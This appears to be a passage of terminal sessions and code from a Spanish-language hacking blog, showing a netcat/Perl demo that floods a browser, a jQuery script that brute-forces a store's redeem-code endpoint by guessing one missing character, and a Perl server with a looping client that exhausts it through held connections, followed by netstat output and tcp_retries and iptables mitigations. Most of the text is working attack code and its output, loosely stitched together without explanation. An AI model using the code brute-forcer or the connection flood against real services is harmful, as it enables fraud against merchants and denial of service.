URL: http://localhost:8080/
Zer0-null:/home/xianur0 # cat http.txt
HTTP/1.1 200 OK
Content-Type: text/plain; charset=UTF-8
Date: Sun, 13 Jan 2013 02:25:35 GMT
Server: xianur0-to-me
Xianur0 was here!!
Zer0-null:/home/xianur0 # nc -vvvl 8080 > respuesta.txt < http.txt
Zer0-null:/home/xianur0/lab # cat generador.pl
#!/usr/bin/perl
while(1){
print "Xianur0\n";
}
Zer0-null:/home/xianur0/lab # perl generador.pl | nc -vvvl 8080
Connection from 127.0.0.1 port 8080 [tcp/http-alt] accepted
GET / HTTP/1.1
Host: localhost:8080
Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.97 Safari/537.11
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: es-ES,es;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
var x_molder = 0;
function pushToken()
{
// REDEEM CODE, REPLACE WITH YOUR OWN
var str_token = "F9?VQ-D8CQ3-XTRG3-4BDTV-B3X7W";
var charset = "1234567890ABCDEFGHIJKLMNOPQRSTUVWXYZ";
var new_token = str_token.replace("?",charset[x_molder]);
$('#TokenValue').val(new_token)
x_molder++;
$('#RedeemCodeMolder').click();
}
$('#RedeemCodeMolder').click(function ()
{
var postData = 'TokenValue=' + $('#TokenValue').val()+ '&__RequestVerificationToken='+ $('input[name="__RequestVerificationToken"]').val();
$.ajax({
type: 'POST',
url: "/es-MX/RedeemCode/PurchaseWithToken",
data: postData,
cache: false,
success: function(response){
if(response.indexOf("Escribe un código válido") > -1)
{
pushToken();
}
else
{
alert(response);
}
},
error: function(){ alert("Error de peticion AJAX"); }
});
});
pushToken();
use IO::Socket;
use threads;
sub clientes {
my ($client) = @_;
while(<$client>) {
if($_ =~ /sleep/){
print "Durmiendo 10 segs...\n";
sleep(10);
}
}
print $client "Awake!\n";
print "Cerrando conexión...\n";
close($client);
}
my $sock = new IO::Socket::INET (
LocalPort => '8080',
Proto => 'tcp',
Listen => 2,
Reuse => 1,
);
die "Could not create socket: $!\n" unless $sock;
while(my $new_sock = $sock->accept()) {
print "Nuevo cliente (".$new_sock->peerhost().") :D\n";
threads->create('clientes', $new_sock);
}
close($sock);
Zer0-null:/home/xianur0 # nc -vvvv localhost 8080
nc: connect to localhost port 8080 (tcp) failed: Connection refused
Connection to localhost 8080 port [tcp/http-alt] succeeded!
sleep
^C
Zer0-null:/home/xianur0 # perl server.pl
Nuevo cliente (127.0.0.1) :D
Durmiendo 10 segs...
Cerrando conexión...
use IO::Socket;
while(1){
my $sock = new IO::Socket::INET (
PeerAddr => 'localhost',
PeerPort => '8080',
Proto => 'tcp') || die("No se puede conectar!\n");
print $sock "sleep\n";
close($sock);
}
Zer0-null:/home/xianur0 # perl server.pl
Nuevo cliente (127.0.0.1) :D
Durmiendo 10 segs...
Nuevo cliente (127.0.0.1) :D
Durmiendo 10 segs...
Nuevo cliente (127.0.0.1) :D
[…]
Zer0-null:/home/xianur0 # netstat | grep -i CLOSE_WAIT
tcp 0 0 localhost:http-alt localhost:36338 CLOSE_WAIT
tcp 0 0 localhost:http-alt localhost:36324 CLOSE_WAIT
tcp 0 0 localhost:http-alt localhost:36330 CLOSE_WAIT
tcp 0 0 localhost:http-alt localhost:36320 CLOSE_WAIT
tcp 0 0 localhost:http-alt localhost:36323 CLOSE_WAIT
tcp 1 0 localhost:http-alt localhost:36322 CLOSE_WAIT
tcp 0 0 localhost:http-alt localhost:36313 CLOSE_WAIT
tcp 1 0 localhost:http-alt localhost:36327 CLOSE_WAIT
tcp 0 0 localhost:http-alt localhost:36339 CLOSE_WAIT
tcp 0 0 localhost:http-alt localhost:36331 CLOSE_WAIT
tcp 1 0 localhost:http-alt localhost:36317 CLOSE_WAIT
tcp 0 0 localhost:http-alt localhost:36328 CLOSE_WAIT
tcp 0 0 localhost:http-alt localhost:36319 CLOSE_WAIT
tcp 0 0 localhost:http-alt localhost:36335 CLOSE_WAIT
tcp 0 0 localhost:http-alt localhost:36334 CLOSE_WAIT
tcp 1 0 localhost:http-alt localhost:36318 CLOSE_WAIT
tcp 0 0 localhost:http-alt localhost:36341 CLOSE_WAIT
tcp 0 0 localhost:http-alt localhost:36314 CLOSE_WAIT
tcp 0 0 localhost:http-alt localhost:36315 CLOSE_WAIT
tcp 0 0 localhost:http-alt localhost:36316 CLOSE_WAIT
tcp 0 0 localhost:http-alt localhost:36321 CLOSE_WAIT
tcp 0 0 localhost:http-alt localhost:36325 CLOSE_WAIT
tcp 0 0 localhost:http-alt localhost:36333 CLOSE_WAIT
tcp 0 0 localhost:http-alt localhost:36336 CLOSE_WAIT
tcp 0 0 localhost:http-alt localhost:36340 CLOSE_WAIT
tcp 0 0 localhost:http-alt localhost:36329 CLOSE_WAIT
tcp 0 0 localhost:http-alt localhost:36326 CLOSE_WAIT
/proc/sys/net/ipv4/tcp_retries1 (min)
/proc/sys/net/ipv4/tcp_retries2 (max)
echo 0 > /proc/sys/net/ipv4/tcp_retries1
echo 0 > /proc/sys/net/ipv4/tcp_retries1
iptables -A INPUT -p tcp -m tcp --dport 8080 -m limit --limit 10/sec -j ACCEPT